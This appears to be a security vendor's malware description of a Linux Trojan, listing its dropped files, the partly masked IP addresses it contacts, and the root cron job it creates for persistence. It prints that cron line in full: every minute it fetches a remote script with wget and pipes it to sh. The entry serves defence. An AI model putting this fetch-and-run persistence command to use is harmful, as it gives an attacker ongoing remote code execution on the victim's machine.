This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Installation
This Trojan drops the following files:
- /var/spool/cron/crontabs/root
- /tmp/kdevtmpfsi
- /tmp/.ICEd-unix/ygLCf
It creates the following folders:
- /tmp/.ICEd-unix/
Other Details
This Trojan connects to the following possibly malicious URL:
- {BLOCKED}.{BLOCKED}.88.102
- {BLOCKED}.{BLOCKED}.169.111
- {BLOCKED}.{BLOCKED}.17.242
- {BLOCKED}.{BLOCKED}.221.224
It does the following:
- It creates the following cron jobs for persistence:
- Path: /var/spool/cron/crontabs/root
- Schedule: Every minute
- Command: * * * * * wget -q -O - http://{BLOCKED}.{BLOCKED}.146.118 /unk.sh | sh > /dev/null 2>&1
